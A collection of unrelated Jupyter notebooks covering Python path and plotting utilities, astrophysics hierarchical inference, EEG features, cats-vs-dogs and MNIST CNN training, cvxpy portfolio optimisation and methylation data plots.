f = Self.sum().is_integer() x = array([3.,1]) test_eq(f(x), True) f = Self.sum().real.is_integer() x = array([3.,1]) test_eq(f(x), True) f = Self.imag() test_eq(f(3), 0) ``` ## File and network functions ``` #export @patch def readlines(self:Path, hint=-1, encoding='utf8'): "Read the content of `fname`" with self.open(encoding=encoding) as f: return f.readlines(hint) #export @patch def read(self:Path, size=-1, encoding='utf8'): "Read the content of `fname`" with self.open(encoding=encoding) as f: return f.read(size) #export @patch def write(self:Path, txt, encoding='utf8'): "Write `txt` to `self`, creating directories as needed" self.parent.mkdir(parents=True,exist_ok=True) with self.open('w', encoding=encoding) as f: f.write(txt) with tempfile.NamedTemporaryFile() as f: fn = Path(f.name) fn.write('t') t = fn.read() test_eq(t,'t') t = fn.readlines() test_eq(t,['t']) #export @patch def save(fn:Path, o): "Save a pickle file, to a file name or opened file" if not isinstance(fn, io.IOBase): fn = open(fn,'wb') try: pickle.dump(o, fn) finally: fn.close() #export @patch def load(fn:Path): "Load a pickle file from a file name or opened file" if not isinstance(fn, io.IOBase): fn = open(fn,'rb') try: return pickle.load(fn) finally: fn.close() with tempfile.NamedTemporaryFile() as f: fn = Path(f.name) fn.save('t') t = fn.load() test_eq(t,'t') #export #NB: Please don't move this to a different line or module, since it's used in testing `get_source_link` @patch def ls(self:Path, n_max=None, file_type=None, file_exts=None): "Contents of path as a list" extns=L(file_exts) if file_type: extns += L(k for k,v in mimetypes.types_map.items() if v.startswith(file_type+'/')) has_extns = len(extns)==0 res = (o for o in self.iterdir() if has_extns or o.suffix in extns) if n_max is not None: res = itertools.islice(res, n_max) return L(res) ``` We add an `ls()` method to `pathlib.Path` which is simply defined as `list(Path.iterdir())`, mainly for convenience in REPL environments such as 
notebooks. ``` path = Path() t = path.ls() assert len(t)>0 t1 = path.ls(10) test_eq(len(t1), 10) t2 = path.ls(file_exts='.ipynb') assert len(t)>len(t2) t[0] ``` You can also pass an optional `file_type` MIME prefix and/or a list of file extensions. ``` txt_files=path.ls(file_type='text') assert len(txt_files) > 0 and txt_files[0].suffix=='.py' ipy_files=path.ls(file_exts=['.ipynb']) assert len(ipy_files) > 0 and ipy_files[0].suffix=='.ipynb' txt_files[0],ipy_files[0] #hide pkl = pickle.dumps(path) p2 =pickle.loads(pkl) test_eq(path.ls()[0], p2.ls()[0]) #export def bunzip(fn): "bunzip `fn`, raising exception if output already exists" fn = Path(fn) assert fn.exists(), f"{fn} doesn't exist" out_fn = fn.with_suffix('') assert not out_fn.exists(), f"{out_fn} already exists" with bz2.BZ2File(fn, 'rb') as src, out_fn.open('wb') as dst: for d in iter(lambda: src.read(1024*1024), b''): dst.write(d) f = Path('files/test.txt') if f.exists(): f.unlink() bunzip('files/test.txt.bz2') t = f.open().readlines() test_eq(len(t),1) test_eq(t[0], 'test\n') f.unlink() #export def join_path_file(file, path, ext=''): "Return `path/file` if file is a string or a `Path`, file otherwise" if not isinstance(file, (str, Path)): return file path.mkdir(parents=True, exist_ok=True) return path/f'{file}{ext}' path = Path.cwd()/'_tmp'/'tst' f = join_path_file('tst.txt', path) assert path.exists() test_eq(f, path/'tst.txt') with open(f, 'w') as f_: assert join_path_file(f_, path) == f_ shutil.rmtree(Path.cwd()/'_tmp') ``` ## Sorting objects from before/after Transforms and callbacks will have run_after/run_before attributes, this function will sort them to respect those requirements (if it's possible). Also, sometimes we want a tranform/callback to be run at the end, but still be able to use run_after/run_before behaviors. For those, the function checks for a toward_end attribute (that needs to be True). 
``` #export def _is_instance(f, gs): tst = [g if type(g) in [type, 'function'] else g.__class__ for g in gs] for g in tst: if isinstance(f, g) or f==g: return True return False def _is_first(f, gs): for o in L(getattr(f, 'run_after', None)): if _is_instance(o, gs): return False for g in gs: if _is_instance(f, L(getattr(g, 'run_before', None))): return False return True def sort_by_run(fs): end = L(fs).attrgot('toward_end') inp,res = L(fs)[~end] + L(fs)[end], L() while len(inp): for i,o in enumerate(inp): if _is_first(o, inp): res.append(inp.pop(i)) break else: raise Exception("Impossible to sort") return res class Tst(): pass class Tst1(): run_before=[Tst] class Tst2(): run_before=Tst run_after=Tst1 tsts = [Tst(), Tst1(), Tst2()] test_eq(sort_by_run(tsts), [tsts[1], tsts[2], tsts[0]]) Tst2.run_before,Tst2.run_after = Tst1,Tst test_fail(lambda: sort_by_run([Tst(), Tst1(), Tst2()])) def tst1(x): return x tst1.run_before = Tst test_eq(sort_by_run([tsts[0], tst1]), [tst1, tsts[0]]) class Tst1(): toward_end=True class Tst2(): toward_end=True run_before=Tst1 tsts = [Tst(), Tst1(), Tst2()] test_eq(sort_by_run(tsts), [tsts[0], tsts[2], tsts[1]]) ``` ## Image helpers ``` #export @delegates(plt.subplots, keep=True) def subplots(nrows=1, ncols=1, figsize=None, imsize=4, **kwargs): if figsize is None: figsize=(imsize*ncols,imsize*nrows) fig,ax = plt.subplots(nrows, ncols, figsize=figsize, **kwargs) if nrows*ncols==1: ax = array([ax]) return fig,ax #hide _,axs = subplots() test_eq(axs.shape,[1]) plt.close() _,axs = subplots(2,3) test_eq(axs.shape,[2,3]) plt.close() #export def show_image(im, ax=None, figsize=None, title=None, ctx=None, **kwargs): "Show a PIL or PyTorch image on `ax`." 
ax = ifnone(ax,ctx) if ax is None: _,ax = plt.subplots(figsize=figsize) # Handle pytorch axis order if hasattrs(im, ('data','cpu','permute')): im = im.data.cpu() if im.shape[0]<5: im=im.permute(1,2,0) elif not isinstance(im,np.ndarray): im=array(im) # Handle 1-channel images if im.shape[-1]==1: im=im[...,0] ax.imshow(im, **kwargs) if title is not None: ax.set_title(title) ax.axis('off') return ax ``` `show_image` can show PIL images... ``` im = Image.open(TEST_IMAGE_BW) ax = show_image(im, cmap="Greys", figsize=(2,2)) ``` ...and color images with standard `CHW` dim order... ``` im2 = np.array(Image.open(TEST_IMAGE)) ax = show_image(im2, figsize=(2,2)) ``` ...and color images with `HWC` dim order... ``` im3 = torch.as_tensor(im2).permute(2,0,1) ax = show_image(im3, figsize=(2,2)) #export def show_titled_image(o, **kwargs): "Call `show_image` destructuring `o` to `(img,title)`" show_image(o[0], title=str(o[1]), **kwargs) show_titled_image((im3,'A puppy'), figsize=(2,2)) #export @delegates(subplots) def show_images(ims, rows=1, titles=None, **kwargs): "Show all images `ims` as subplots with `rows` using `titles`" cols = int(math.ceil(len(ims)/rows)) if titles is None: titles = [None]*len(ims) axs = subplots(rows,cols,**kwargs)[1].flat for im,t,ax in zip(ims, titles, axs): show_image(im, ax=ax, title=t) show_images((im,im3), titles=('number','puppy'), imsize=2) ``` `ArrayImage`, `ArrayImageBW` and `ArrayMask` are subclasses of `ndarray` that know how to show themselves. 
``` #export class ArrayBase(ndarray): def __new__(cls, x, *args, **kwargs): if isinstance(x,tuple): super().__new__(cls, x, *args, **kwargs) if args or kwargs: raise RuntimeError('Unknown array init args') if not isinstance(x,ndarray): x = array(x) return x.view(cls) #export class ArrayImageBase(ArrayBase): _show_args = {'cmap':'viridis'} def show(self, ctx=None, **kwargs): return show_image(self, ctx=ctx, **{**self._show_args, **kwargs}) #export class ArrayImage(ArrayImageBase): pass #export class ArrayImageBW(ArrayImage): _show_args = {'cmap':'Greys'} #export class ArrayMask(ArrayImageBase): _show_args = {'alpha':0.5, 'cmap':'tab20', 'interpolation':'nearest'} im = Image.open(TEST_IMAGE) im_t = ArrayImage(im) test_eq(type(im_t), ArrayImage) im_t2 = ArrayMask(1) test_eq(type(im_t2), ArrayMask) test_eq(im_t2, array(1)) ax = im_t.show(figsize=(2,2)) test_fig_exists(ax) ``` ## Other helpers ``` #export class PrettyString(str): "Little hack to get strings to show properly in Jupyter." def __repr__(self): return self #export def get_empty_df(n): "Return `n` empty rows of a dataframe" df = pd.DataFrame(index = range(n)) return [df.iloc[i] for i in range(n)] #export def display_df(df): "Display `df` in a notebook or defaults to print" try: from IPython.display import display, HTML except: return print(df) display(HTML(df.to_html())) #export def round_multiple(x, mult, round_down=False): "Round `x` to nearest multiple of `mult`" def _f(x_): return (int if round_down else round)(x_/mult)*mult res = L(x).map(_f) return res if is_listy(x) else res[0] test_eq(round_multiple(63,32), 64) test_eq(round_multiple(50,32), 64) test_eq(round_multiple(40,32), 32) test_eq(round_multiple( 0,32), 0) test_eq(round_multiple(63,32, round_down=True), 32) test_eq(round_multiple((63,40),32), (64,32)) #export def even_mults(start, stop, n): "Build log-stepped array from `start` to `stop` in `n` steps." 
if n==1: return stop mult = stop/start step = mult**(1/(n-1)) return np.array([start*(step**i) for i in range(n)]) test_eq(even_mults(2,8,3), [2,4,8]) test_eq(even_mults(2,32,5), [2,4,8,16,32]) test_eq(even_mults(2,8,1), 8) #export def num_cpus(): "Get number of cpus" try: return len(os.sched_getaffinity(0)) except AttributeError: return os.cpu_count() defaults.cpus = num_cpus() #export def add_props(f, n=2): "Create properties passing each of `range(n)` to f" return (property(partial(f,i)) for i in range(n)) class _T(): a,b = add_props(lambda i,x:i*2) t = _T() test_eq(t.a,0) test_eq(t.b,2) # export def change_attr(o, name, new_val): "Change the attr `name` in `o` with `new_val` if it exists and return the old value" old = getattr(o, name, None) if hasattr(o, 'name'): setattr(o, name, new_val) return o,old,hasattr(o, 'name') # export def change_attrs(o, names, new_vals, do=None): "Change the attr `names` in `o` with `new_vals` if it exists and return the old values" olds,has = L(),L() if do is None: do = L(True) * len(names) for n,v,d in zip(names, new_vals, do): if d: o,old,h = change_attr(o, n, v) olds.append(old); has.append(h) return o,olds,has ``` # Export - ``` #hide from nbdev.export import notebook2script notebook2script() ```
github_jupyter
``` import json import os, shutil from ovejero import model_trainer, hierarchical_inference from matplotlib import pyplot as plt from matplotlib.lines import Line2D import matplotlib def NOTIMPLEMENTED(): raise NotImplementedError('Must specify config/save path') ``` # Hierarchical Inference on a Test Set __Author:__ Sebastian Wagner-Carena __Last Run:__ 08/15/2020 __Goals:__ Learn how to run hierarchical inference on a test set using a trained BNN __Before running this notebook:__ Train a model and generate a test set on which you want to run hierarchical inference. To run hierarchical inference first we need to specify the path to the config files we'll use. There are three required configs for hierarchical inference: 1. The ovejero bnn config used for training/validation/testing 2. The ovejero distribution config that specifies the hyperparameters we'll run hierarchical inference over. For an example see the config in configs/baobab_configs/cent_narrow_cfg_prior.py. 3. The baobab config used to generate the training set. You can also optionally specify the baobab config used to generate the test set. This will be used to plot the true values of the hyperparameters you're trying to infer. ``` # These are also optional, but these are the names of the hyperparameters and parameters of the lens sample. # They will only be used in plotting. 
hyperparam_plot_names = [r'$\mu_{\log(\gamma_\mathrm{ext})}$',r'$\sigma_{\log(\gamma_\mathrm{ext})}$', r'$\mu_x$',r'$\sigma_x$',r'$\mu_y$',r'$\sigma_y$', r'$\mu_{e1}$',r'$\sigma_{e1}$', r'$\mu_{e2}$',r'$\sigma_{e2}$', r'$\mu_{\log (\gamma_\mathrm{lens})}$',r'$\sigma_{\log (\gamma_\mathrm{lens})}$', r'$\mu_{\log (\theta_E)}$',r'$\sigma_{\log (\theta_E)}$'] param_plot_names = [r'$\gamma_\mathrm{ext}$', r'$\psi_\mathrm{ext}$',r'$x_\mathrm{lens}$', r'$y_\mathrm{lens}$',r'$e_1$',r'$e_2$',r'$\gamma_\mathrm{lens}$',r'$\theta_E$'] # The config path used to train the BNN bnn_config_path = NOTIMPLEMENTED() bnn_cfg = model_trainer.load_config(bnn_config_path) def recursive_str_checker(cfg_dict): for key in cfg_dict: if isinstance(cfg_dict[key],str): cfg_dict[key] = cfg_dict[key].replace('/home/swagnercarena/ovejero/',root_path) if isinstance(cfg_dict[key],dict): recursive_str_checker(cfg_dict[key]) recursive_str_checker(bnn_cfg) # The baobab config used to generate the training set. interim_baobab_omega_path = NOTIMPLEMENTED() # The ovejero distribution config specifying the hyperparameters you want to fit. target_ovejero_omega_path = NOTIMPLEMENTED() # Optional, but you can also specify the baobab config used to generate the test set. target_baobab_omega_path = NOTIMPLEMENTED() # The path to the test dataset test_dataset_path = '/Users/sebwagner/Documents/Grad_School/Research/Phil/ovejero/datasets/cent_narrow/' # NOTIMPLEMENTED() # The path to which the tf record will be saved test_dataset_tf_record_path = NOTIMPLEMENTED() # The number of walkers to use in the hierarchical inference. This should be AT LEAST double the number of # hyperparameters that are being inferred. n_walkers = 50 # If you've already generated the samples you can set this to True. If you do, the weights won't be # loaded, avoiding memory errors. 
lite_class = False # The HierarchicalClass will do all the heavy lifting of preparing the model from the configuration file, # initializing the test dataset, and providing outputs correctly marginalized over the BNN uncertainties. # To initialize it we need to pass in our config files hier_infer = hierarchical_inference.HierarchicalClass(bnn_cfg,interim_baobab_omega_path,target_ovejero_omega_path, test_dataset_path,test_dataset_tf_record_path, target_baobab_omega_path=target_baobab_omega_path, lite_class=lite_class) ``` After we've initialized our class, we need to generate bnn samples for the lenses in our test set. ``` # A path where the BNN samples will be saved save_path_samples = NOTIMPLEMENTED() # The number of BNN samples to draw per lens num_samples = 1000 # This command will generate the samples on the test set hier_infer.gen_samples(num_samples,save_path_samples) ``` Now we can run the hierarchical inference. We have to specify the number of walkers and the path to save the emcee samples to. We'll pick a specific path for the demo that we'll clear out later. ``` # Number of walkers n_walkers = 50 # The path to save the emcee samples to save_path_chains_hr = NOTIMPLEMENTED() # Initialize the sampler hier_infer.initialize_sampler(n_walkers,save_path_chains_hr) ``` Finally, we can run our hierarchical inference. For 100 steps this should take a few minutes (less when you have more cores) ``` # We can run the sampler for 100 steps. num_emcee_samples = 100 hier_infer.run_sampler(num_emcee_samples,progress=True) ``` 100 steps isn't enough for convergence, but we can still inspect the chains. The HierarchicalInference class allows us to plot the chains and to do some basic autocorrelation analysis. Neither plot should make you feel like things have converged in 100 steps. 
``` burnin = 0 hier_infer.plot_chains(burnin=burnin,hyperparam_plot_names=hyperparam_plot_names) hier_infer.plot_auto_corr(hyperparam_plot_names=hyperparam_plot_names) ``` The class also allows us to inspect the results of the hierarchical inference and generate some nice plots. For an example check the hierarchical inference notebook in the papers folder. ``` # Delete the weights we generated. os.remove('demo_hier_samples.h5') shutil.rmtree('fow_model_bnn_samps') ```
github_jupyter
``` import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt w = np.load('w_windows.npy') n = np.load('n_windows.npy') from scipy.stats import skew, kurtosis from numba import jit fs = 256 jw = fs//.25 @jit(nopython=True) def energy(x): return np.sum(np.abs(x)**2) @jit(nopython=True) def mpp(x): return np.array([np.mean(x[:,i]) for i in range(len(x[0]))]) def curtose(s, j): m = np.zeros((21,len(j)-1)) for i in range(len(m)): m[i] = np.array([kurtosis(s[i,j[ii]:j[ii+1]]) for ii in range(len(j)-1)]) return mpp(m) def assimetria(s, j): m = np.zeros((21,len(j)-1)) for i in range(len(m)): m[i] = np.array([skew(s[i,j[ii]:j[ii+1]]) for ii in range(len(j)-1)]) return mpp(m) def variancia(s, j): m = np.zeros((21,len(j)-1)) for i in range(len(m)): m[i] = np.array([np.var(s[i,j[ii]:j[ii+1]]) for ii in range(len(j)-1)]) return mpp(m) def energia(s, j): m = np.zeros((21,len(j)-1)) for i in range(len(m)): m[i] = np.array([energy(s[i,j[ii]:j[ii+1]]) for ii in range(len(j)-1)]) return mpp(m) janela = lambda jfs,s:np.array([i*jfs for i in range(s//jfs+1)]) jc = janela(int(jw),len(w[0])) c = curtose(w,jc) a = assimetria(w,jc) v = variancia(w,jc) e = energia(w,jc) w_features = np.array([c,a,v,e]) w_features.shape jc = janela(int(jw),len(n[0])) c = curtose(n,jc) a = assimetria(n,jc) v = variancia(n,jc) e = energia(n,jc) n_features = np.array([c,a,v,e]) n_features.shape ``` ## Visualização de gráficos ``` col = ['Kurtosis','Skewness','Variance','Energy'] data = pd.DataFrame(np.hstack((w_features,n_features)).T,columns=col) y = np.hstack((np.repeat('Yes',w_features.shape[1]),np.repeat('No',w_features.shape[1]))) data['Class'] = y data.head() fig, ax = plt.subplots(2,2) sns.boxplot(x="Class", y="Kurtosis", hue="Class",data=data,ax=ax[0,0],showfliers=False) sns.boxplot(x="Class", y="Skewness", hue="Class",data=data,ax=ax[0,1],showfliers=False) sns.boxplot(x="Class", y="Variance", hue="Class",data=data,ax=ax[1,0],showfliers=False) sns.boxplot(x="Class", 
y="Energy", hue="Class",data=data,ax=ax[1,1],showfliers=False) fig, ax = plt.subplots(2,2) sns.violinplot(x="Class", y="Kurtosis", hue="Class",data=data,ax=ax[0,0]) sns.violinplot(x="Class", y="Skewness", hue="Class",data=data,ax=ax[0,1]) sns.violinplot(x="Class", y="Variance", hue="Class",data=data,ax=ax[1,0]) sns.violinplot(x="Class", y="Energy", hue="Class",data=data,ax=ax[1,1]) ```
github_jupyter
# Cats vs Dogs - Best Model ``` # In this exercise you will train a CNN on the FULL Cats-v-dogs dataset # This will require you doing a lot of data preprocessing because # the dataset isn't split into training and validation for you # This code block has all the required inputs import os import zipfile import random import tensorflow as tf from tensorflow.keras.optimizers import RMSprop from tensorflow.keras.preprocessing.image import ImageDataGenerator from shutil import copyfile !wget --no-check-certificate \ "https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip" \ -O "/tmp/cats-and-dogs.zip" local_zip = '/tmp/cats-and-dogs.zip' zip_ref = zipfile.ZipFile(local_zip, 'r') zip_ref.extractall('/tmp') zip_ref.close() print(len(os.listdir('/tmp/PetImages/Cat/'))) print(len(os.listdir('/tmp/PetImages/Dog/'))) # Expected Output: # 12501 # 12501 # Use os.mkdir to create your directories # You will need a directory for cats-v-dogs, and subdirectories for training # and testing. 
These in turn will need subdirectories for 'cats' and 'dogs' try: base_dir = '/tmp/cats-v-dogs' os.mkdir(base_dir) os.mkdir(os.path.join(base_dir,'training/')) os.mkdir(os.path.join(base_dir,'testing/')) os.mkdir(os.path.join(base_dir,'training/cats/')) os.mkdir(os.path.join(base_dir,'training/dogs/')) os.mkdir(os.path.join(base_dir,'testing/cats/')) os.mkdir(os.path.join(base_dir,'testing/dogs/')) except OSError: pass def split_data(SOURCE, TRAINING, TESTING, SPLIT_SIZE): img_temp = [img for img in os.listdir(SOURCE) if os.path.getsize(SOURCE+img)>0] img_temp = random.sample(img_temp,len(img_temp)) for f in img_temp[0:int(len(img_temp)*SPLIT_SIZE)]: copyfile(SOURCE+f, TRAINING+f) for f in img_temp[int(len(img_temp)*SPLIT_SIZE):]: copyfile(SOURCE+f, TESTING+f) CAT_SOURCE_DIR = "/tmp/PetImages/Cat/" TRAINING_CATS_DIR = "/tmp/cats-v-dogs/training/cats/" TESTING_CATS_DIR = "/tmp/cats-v-dogs/testing/cats/" DOG_SOURCE_DIR = "/tmp/PetImages/Dog/" TRAINING_DOGS_DIR = "/tmp/cats-v-dogs/training/dogs/" TESTING_DOGS_DIR = "/tmp/cats-v-dogs/testing/dogs/" split_size = .9 split_data(CAT_SOURCE_DIR, TRAINING_CATS_DIR, TESTING_CATS_DIR, split_size) split_data(DOG_SOURCE_DIR, TRAINING_DOGS_DIR, TESTING_DOGS_DIR, split_size) print(len(os.listdir('/tmp/cats-v-dogs/training/cats/'))) print(len(os.listdir('/tmp/cats-v-dogs/training/dogs/'))) print(len(os.listdir('/tmp/cats-v-dogs/testing/cats/'))) print(len(os.listdir('/tmp/cats-v-dogs/testing/dogs/'))) # Expected output: # 11250 # 11250 # 1250 # 1250 # DEFINE A KERAS MODEL TO CLASSIFY CATS V DOGS # USE AT LEAST 3 CONVOLUTION LAYERS model = tf.keras.models.Sequential([ tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(150,150,3)), tf.keras.layers.MaxPooling2D(2,2), tf.keras.layers.Conv2D(32, (3, 3), activation='relu'), tf.keras.layers.MaxPooling2D(2,2), tf.keras.layers.Conv2D(64, (3, 3), activation='relu'), tf.keras.layers.MaxPooling2D(2,2), tf.keras.layers.Flatten(), tf.keras.layers.Dense(512, activation='relu'), 
tf.keras.layers.Dense(1, activation='sigmoid') ]) model.compile(optimizer=RMSprop(lr=0.001), loss='binary_crossentropy', metrics=['acc']) TRAINING_DIR = '/tmp/cats-v-dogs/training/' train_datagen = ImageDataGenerator(rescale=1./255.) # NOTE: YOU MUST USE A BATCH SIZE OF 10 (batch_size=10) FOR THE # TRAIN GENERATOR. train_generator = train_datagen.flow_from_directory(TRAINING_DIR, batch_size=10, class_mode='binary', target_size=(150,150)) VALIDATION_DIR = '/tmp/cats-v-dogs/testing' validation_datagen = ImageDataGenerator(rescale=1./255.) # NOTE: YOU MUST USE A BACTH SIZE OF 10 (batch_size=10) FOR THE # VALIDATION GENERATOR. validation_generator = validation_datagen.flow_from_directory(VALIDATION_DIR, batch_size=10, class_mode='binary', target_size=(150,150)) # Expected Output: # Found 22498 images belonging to 2 classes. # Found 2500 images belonging to 2 classes. history = model.fit(train_generator, epochs=15, verbose=1, validation_data=validation_generator) # The expectation here is that the model will train, and that accuracy will be > 95% on both training and validation # i.e. 
acc:A1 and val_acc:A2 will be visible, and both A1 and A2 will be > .9 # PLOT LOSS AND ACCURACY %matplotlib inline import matplotlib.image as mpimg import matplotlib.pyplot as plt #----------------------------------------------------------- # Retrieve a list of list results on training and test data # sets for each training epoch #----------------------------------------------------------- acc=history.history['acc'] val_acc=history.history['val_acc'] loss=history.history['loss'] val_loss=history.history['val_loss'] epochs=range(len(acc)) # Get number of epochs #------------------------------------------------ # Plot training and validation accuracy per epoch #------------------------------------------------ plt.plot(epochs, acc, 'r', "Training Accuracy") plt.plot(epochs, val_acc, 'b', "Validation Accuracy") plt.title('Training and validation accuracy') plt.figure() #------------------------------------------------ # Plot training and validation loss per epoch #------------------------------------------------ plt.plot(epochs, loss, 'r', "Training Loss") plt.plot(epochs, val_loss, 'b', "Validation Loss") plt.title('Training and validation loss') # Desired output. Charts with training and validation metrics. No crash :) ```
github_jupyter
# Portfolio Optimization using cvxpy ## Imports ``` import cvxpy as cvx import numpy as np import quiz_tests ``` ## Optimization with cvxpy http://www.cvxpy.org/ Practice using cvxpy to solve a simple optimization problem. Find the optimal weights on a two-asset portfolio given the variance of Stock A, the variance of Stock B, and the correlation between Stocks A and B. Create a function that takes in these values as arguments and returns the vector of optimal weights, i.e., $\mathbf{x} = \begin{bmatrix} x_A & x_B \end{bmatrix} $ Remember that the constraint in this problem is: $x_A + x_B = 1$ ## Hints ### standard deviation standard deviation $\sigma_A = \sqrt(\sigma^2_A)$, where $\sigma^2_A$ is variance of $x_A$ look at `np.sqrt()` ### covariance correlation between the stocks is $\rho_{A,B}$ covariance between the stocks is $\sigma_{A,B} = \sigma_A \times \sigma_B \times \rho_{A,B}$ ### x vector create a vector of 2 x variables $\mathbf{x} = \begin{bmatrix} x_A & x_B \end{bmatrix} $ we can use `cvx.Variable(2)` ### covariance matrix The covariance matrix $P = \begin{bmatrix} \sigma^2_A & \sigma_{A,B} \\ \sigma_{A,B} & \sigma^2_B \end{bmatrix}$ We can create a 2 x 2 matrix using a 2-dimensional numpy array `np.array([["Cindy", "Liz"],["Eddy", "Brok"]])` ### quadratic form We can write the portfolio variance $\sigma^2_p = \mathbf{x^T} \mathbf{P} \mathbf{x}$ Recall that the $\mathbf{x^T} \mathbf{P} \mathbf{x}$ is called the quadratic form. We can use the cvxpy function `quad_form(x,P)` to get the quadratic form. ### objective function Next, we want to define the objective function. In this case, we want to minimize something. What do we want to minimize in this case? We want to minimize the portfolio variance, which is defined by our quadratic form $\mathbf{x^T} \mathbf{P} \mathbf{x}$ We can find the objective function using cvxpy `objective = cvx.Minimize()`. Can you guess what to pass into this function? 
### constraints

We can also define our constraints in a list. For example, if you wanted the $\sum_{1}^{n}x = 1$, you could save a variable as `[sum(x)==1]`, where x was created using `cvx.Variable()`.

### optimization

So now that we have our objective function and constraints, we can solve for the values of $\mathbf{x}$.

cvxpy has the constructor `Problem(objective, constraints)`, which returns a `Problem` object.

The `Problem` object has a function solve(), which returns the minimum of the solution. In this case, this is the minimum variance of the portfolio.

It also updates the vector $\mathbf{x}$.

We can check out the values of $x_A$ and $x_B$ that gave the minimum portfolio variance by using `x.value`

```
import cvxpy as cvx
import numpy as np

def optimize_twoasset_portfolio(varA, varB, rAB):
    """Create a function that takes in the variance of Stock A, the
    variance of Stock B, and the correlation between Stocks A and B as
    arguments and returns the vector of optimal weights

    Parameters
    ----------
    varA : float
        The variance of Stock A.

    varB : float
        The variance of Stock B.

    rAB : float
        The correlation between Stocks A and B.

    Returns
    -------
    (xA, xB) : tuple of float
        The weights on Stocks A and B that minimize the portfolio
        variance.  NOTE(review): the prompt above asks for a 2-element
        np.ndarray, but this implementation actually returns a plain
        tuple, which the callers below unpack as ``xA, xB``.
    """
    # TODO: Use cvxpy to determine the weights on the assets in a 2-asset
    # portfolio that minimize portfolio variance.

    stdA, stdB = np.sqrt(varA), np.sqrt(varB)
    # covariance sigma_AB = sigma_A * sigma_B * rho_AB
    cov = rAB * stdA * stdB
    x = cvx.Variable(2)
    # covariance matrix P = [[varA, cov], [cov, varB]]
    P = np.array([[varA, cov], [cov, varB]])
    # portfolio variance is the quadratic form x^T P x
    objective = cvx.Minimize(cvx.quad_form(x, P))
    # fully-invested constraint: the two weights sum to 1
    constraints = [sum(x) == 1]
    problem = cvx.Problem(objective, constraints)
    # solve() returns the minimum portfolio variance and updates x.value
    result = problem.solve()
    min_value = problem.value
    xA,xB = x.value[0], x.value[1]
    return xA, xB

quiz_tests.test_optimize_twoasset_portfolio(optimize_twoasset_portfolio)

"""Test run optimize_twoasset_portfolio()."""
xA,xB = optimize_twoasset_portfolio(0.1, 0.05, 0.25)
print("Weight on Stock A: {:.6f}".format(xA))
print("Weight on Stock B: {:.6f}".format(xB))
```
github_jupyter
# MNIST DATA with Convolutional Neural Network ## 1. Import Packages ``` import input_data import numpy as np import matplotlib.pylab as plt import tensorflow as tf import keras from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten from keras.layers.convolutional import Conv2D, MaxPooling2D from keras.models import load_model import tensorflow.compat.v1 as tf tf.disable_v2_behavior() ``` ## 2. Explore MNIST Data ``` mnist_images = input_data.read_data_sets("./mnist_data", one_hot=False) # Example of a picture pic,real_values = mnist_images.train.next_batch(25) index = 11 # changeable with 0 ~ 24 integer image = pic[index,:] image = np.reshape(image,[28,28]) plt.imshow(image) plt.show() # Explore MNIST data plt.figure(figsize=(10,10)) for i in range(25): plt.subplot(5,5,i+1) plt.xticks([]) plt.yticks([]) plt.grid(False) image = np.reshape(pic[i,:] , [28,28]) plt.imshow(image) plt.xlabel(real_values[i]) plt.show() ``` ## 3. Make Dataset ``` # Download Data : http://yann.lecun.com/exdb/mnist/ # Data input script : https://github.com/tensorflow/tensorflow/tree/master/tensorflow/examples/tutorials/mnist mnist = input_data.read_data_sets("./samples/MNIST_data/", one_hot=True) print("the number of train examples :" , mnist.train.num_examples) print("the number of test examples :" , mnist.test.num_examples) x_train = mnist.train.images.reshape(55000, 28, 28, 1) x_test = mnist.test.images.reshape(10000, 28, 28, 1) y_train = mnist.train.labels y_test = mnist.test.labels ``` ## 4. 
Building my neural network in tensorflow ``` batch_size = 128 num_classes = 10 epochs = 50 model = Sequential() model.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same', activation='relu', input_shape=(28,28,1))) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Conv2D(64, (5, 5), activation='relu', padding='same')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(1024, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(num_classes, activation='softmax')) model.summary() model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) hist = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test)) ``` ## 5. Calculate Accuracy ``` score1 = model.evaluate(x_train, y_train, verbose=0) score2 = model.evaluate(x_test, y_test, verbose=0) print('Train accuracy:', score1[1]) print('Test accuracy:', score2[1]) ``` ## 6. Check a prediction ``` predictions = model.predict(x_test) predictions[101] print(np.argmax(predictions[101])) # highest confidence # This model is convinced that this image is "1" plt.imshow(x_test[101].reshape(28,28)) ``` ## 7. Save model ``` # Save model model_json = model.to_json() with open("model.json", "w") as json_file : json_file.write(model_json) # Save model weights model.save_weights("model_weight.h5") print("Saved model to disk") # evaluate loaded_model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) train_score = loaded_model.evaluate(x_train, y_train, verbose=0) test_score = loaded_model.evaluate(x_test, y_test, verbose=0) print('training accuracy : ' + str(train_score[1])) print('test accuracy : ' + str(test_score[1])) ```
github_jupyter
``` import sys import os from glob import glob import random import numpy as np import pandas as pd from scipy import stats import matplotlib.pyplot as plt from matplotlib.colors import ListedColormap import seaborn as sns from openpyxl import load_workbook from sinaplot import sinaplot ## Default plotting params %matplotlib inline sns.set(font='Arial') plt.rcParams['svg.fonttype'] = 'none' style = sns.axes_style('white') style.update(sns.axes_style('ticks')) style['xtick.major.size'] = 2 style['ytick.major.size'] = 2 sns.set(font_scale=2, style=style) pal = sns.color_palette(['#0072b2', '#009e73', '#d55e00', '#f0e442', '#cc79a7']) cmap = ListedColormap(pal.as_hex()) sns.set_palette(pal) sns.palplot(pal) plt.show() exp1 = pd.read_excel( './methylation_Summary_file.xlsx', sheet_name='line graphs_01.04.15', header=1, usecols='B:CZ,DB', names=([f'WT_{i}' for i in range(49)] + [f'VIRc_{i}' for i in range(30)] + [f'vir-1_{i}' for i in range(24)] + ['hours']), ).set_index('hours') exp1.head() mean_df = pd.melt( exp1.reset_index(), id_vars=['hours'], var_name='replicate', value_name='delayed_fluorescence' ) mean_df['condition'] = mean_df.replicate.str.split('_', expand=True)[0] fig, ax = plt.subplots(figsize=(10, 5)) sns.lineplot( x='hours', y='delayed_fluorescence', hue='condition', hue_order=['WT', 'VIRc', 'vir-1'], data=mean_df, ax=ax, 